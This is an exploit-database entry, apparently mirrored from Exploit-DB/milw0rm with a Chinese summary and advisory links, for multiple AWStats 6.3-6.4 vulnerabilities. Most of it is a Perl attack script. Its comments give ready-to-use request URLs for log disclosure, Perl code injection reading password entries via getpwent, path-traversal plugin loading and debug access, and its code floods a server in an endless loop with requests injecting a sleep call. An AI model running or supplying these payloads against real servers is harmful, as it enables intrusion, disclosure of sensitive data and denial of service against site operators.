https://www.exploit-db.com/exploits/817
https://www.securityfocus.com/bid/90266
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-303

AWStats6.3和6.4的awstats.pl允许远程攻击者通过向rawlog设置loadplugin和pluginmode参数来读取服务器Web日志文件。

#!/usr/bin/perl
# 
# 
# Summarized the advisory www.ghc.ru GHC: /str0ke
#											
# [0] Exploitable example (raw log plugin):						
#    Attacker can read sensitive information						
#											
# http://server/cgi-bin/awstats-6.4/awstats.pl?pluginmode=rawlog&loadplugin=rawlog	
#											
# [1] Perl code execution. (This script)						
#											
# http://server/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:print+getpwent		
#											
# [2] Arbitrary plugin including.							
# 											
# http://server/cgi-bin/awstats-6.4/awstats.pl?&loadplugin=../../../../usr/libdata/perl/5.00503/blib
#											
# [3] Sensetive information leak in AWStats version 6.3(Stable) - 6.4(Development).	
#    Every user can access debug function:						
#											
# http://server/cgi-bin/awstats-6.4/awstats.pl?debug=1					
# http://server/cgi-bin/awstats-6.4/awstats.pl?debug=2                                  
#											
# Be sure to change the $server + /cgi-bin location /str0ke				
#											

use IO::Socket;
$server = 'www.example.com';
sub ConnectServer {
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80")
|| die "Errorn";
print $socket "GET /cgi-bin/awstats-6.4/awstats.pl?&hack=$rp&PluginMode=:sleep HTTP/1.1n";
print $socket "Host: $servern";
print $socket "Accept: */*n";
print $socket "nn";
}

while () {
$rp = rand;
&ConnectServer;
}

# milw0rm.com [2005-02-14]

AWStats AWStats 6.4

AWStats AWStats 6.3

来源:SECUNIA
名称:14299
链接:http://secunia.com/advisories/14299
来源:XF
名称:awstats-awstatpl-obtain-information(19333)
链接:http://xforce.iss.net/xforce/xfdb/19333
来源:BUGTRAQ
名称:20050214AWStats<=6.4Multiplevulnerabilities
链接:http://www.securityfocus.com/archive/1/390368